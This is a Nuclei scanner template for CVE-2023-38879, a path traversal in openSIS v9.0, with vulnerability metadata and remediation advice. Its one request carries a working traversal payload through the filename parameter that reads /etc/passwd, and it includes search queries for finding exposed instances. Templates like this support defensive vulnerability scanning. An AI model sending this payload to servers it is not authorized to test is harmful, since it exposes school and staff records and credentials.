id: CVE-2023-38879

info:
  name: openSIS v9.0 - Path Traversal
  author: haliteroglu
  severity: high
  description: |
    A path traversal vulnerability exists in openSIS Classic Community Edition v9.0 via the 'filename' parameter in DownloadWindow.php. An unauthenticated remote attacker can exploit this to read arbitrary files on the server by manipulating file paths.
  impact: |
    Unauthenticated attackers can read arbitrary files from the server by manipulating the filename parameter in DownloadWindow.php, potentially exposing student records, staff information, and database credentials.
  remediation: |
    Update openSIS to a version newer than 9.0 that validates file paths in DownloadWindow.php and restricts file access to authorized directories only.
  reference:
    - https://github.com/dub-flow/vulnerability-research/tree/main/CVE-2023-38879
    - https://nvd.nist.gov/vuln/detail/CVE-2023-38879
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-38879
    cwe-id: CWE-22
    epss-score: 0.11974
    epss-percentile: 0.93896
    cpe: cpe:2.3:a:os4ed:opensis:9.0:*:*:*:community:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: os4ed
    product: opensis
    shodan-query: title:"openSIS"
    fofa-query: title="openSIS"
  tags: cve,cve2023,opensis,lfi,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/DownloadWindow.php?filename=../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header
        words:
          - "filename="
          - "text/html"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402205b28d783f35a4bd28e6541337361d135296b6c1e74ac5e0a5a29d3d8a688feff0220788735244d8faf4356a407191de6b87c6543b0bcf5eff83b2adf8de4538b60f0:922c64590222798bb761d5b6d8e72950